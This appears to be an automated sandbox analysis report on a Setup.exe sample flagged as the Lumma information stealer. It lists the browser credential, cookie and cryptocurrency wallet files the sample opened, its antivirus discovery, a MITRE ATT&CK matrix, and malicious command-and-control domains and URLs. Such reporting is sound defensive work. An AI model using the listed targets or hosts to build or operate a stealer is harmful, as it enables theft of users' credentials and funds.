              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5b9cb0ef VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Code function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,36_2_00491486
              Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: find.exe, 0000001B.00000002.2363311941.00000188DB950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1974727785.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: Setup.exe PID: 7316, type: MEMORYSTR
              Source: Yara match File source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Setup.exe, 00000000.00000003.1842566188.00000000006DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertycount-:
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: w"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7316, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: Process Memory Space: Setup.exe PID: 7316, type: MEMORYSTR
              Source: Yara match File source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 11 File and Directory Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 12 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 224 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 521 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 221 Virtualization/Sandbox Evasion | Cached Domain Credentials | 221 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Process Injection | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              [Behavior graph: ID 1583071, Sample: Setup.exe, Startdate: 01/01/2025, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label | Link
              Setup.exe | 14% | Virustotal | | Browse
              Setup.exe | 32% | ReversingLabs | |
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe | 53% | ReversingLabs | Win32.Spyware.Lummastealer |
              C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp | 0% | ReversingLabs | |
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | |
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-7IJ4L.tmp | 8% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://abberanteusz.click/k | 0% | Avira URL Cloud | safe |
              https://klipvumisui.shop/int_clp_sha.txtot | 100% | Avira URL Cloud | malware |
              https://klipvumisui.shop/int_clp_sha.txtPE | 100% | Avira URL Cloud | malware |
              https://abberanteusz.click/u | 0% | Avira URL Cloud | safe |
              http://www.autohotkey.comCould | 0% | Avira URL Cloud | safe |
              https://abberanteusz.click/C | 0% | Avira URL Cloud | safe |
              https://abberanteusz.click/apiFil | 0% | Avira URL Cloud | safe |
              https://abberanteusz.click/ | 0% | Avira URL Cloud | safe |
              https://cegu.shop/8574262446/ph.txt8Q | 100% | Avira URL Cloud | malware |
              https://cegu.shop/HQ | 100% | Avira URL Cloud | malware |
              abberanteusz.click | 0% | Avira URL Cloud | safe |
              https://abberanteusz.click/api | 0% | Avira URL Cloud | safe |
              https://abberanteusz.click/# | 0% | Avira URL Cloud | safe |
              http://michaeluno.jp/4 | 0% | Avira URL Cloud | safe |
              http://crl.micro;q | 0% | Avira URL Cloud | safe |
              https://klipvumisui.shop/int_clp_sha.txtR3SF | 100% | Avira URL Cloud | malware |
              https://abberanteusz.click/apig | 0% | Avira URL Cloud | safe |
              https://abberanteusz.click:443/api | 0% | Avira URL Cloud | safe |
              https://klipvumisui.shop/ | 100% | Avira URL Cloud | malware |
              https://abberanteusz.click/api: | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cegu.shop | 185.161.251.21 | true | false | | high
              abberanteusz.click | 172.67.198.102 | true | true | | unknown
              klipvumisui.shop | 104.21.37.128 | true | false | | high
              dfgh.online | unknown | unknown | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              rabidcowse.shop | false | | high
              abberanteusz.click | true | Avira URL Cloud: safe | unknown
              https://abberanteusz.click/api | true | Avira URL Cloud: safe | unknown
              cloudewahsj.shop | false | | high
              nearycrepso.shop | false | | high
              abruptyopsn.shop | false | | high
              https://klipvumisui.shop/int_clp_sha.txt | false | | high
              wholersorie.shop | false | | high
              noisycuttej.shop | false | | high
                                                                                                high
                                                                                                https://abberanteusz.click/#Setup.exe, 00000000.00000003.1856495243.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://klipvumisui.shop/Setup.exe, 00000000.00000003.1972142744.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      http://crl.micro;qpowershell.exe, 00000002.00000002.1920940710.000000000330A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crl.micropowershell.exe, 00000002.00000002.1921140476.000000000335F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.microsofSetup.exe, 00000000.00000003.1800048845.0000000003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.info-zip.org/BrightLib.exe, 00000024.00000002.2478910249.0000000039F72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://ocsp.securetrust.com/0?Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://repository.certum.pl/cscasha2.cer0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.sectigo.com0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                        high
                                                                                                                        http://ocsp.vikingcloud.com/0ASetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://certs.securetrust.com/issuers/TWGCA.crt0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://ocsp.vikingcloud.com/0:Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://dfgh.online/invoker.php?compName=powershell.exe, 00000002.00000002.1920721795.00000000032C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://go.microspowershell.exe, 00000002.00000002.1922557688.0000000005726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crt.sectigo.com/SectigWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://subca.ocsp-certum.com01WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://contoso.com/powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
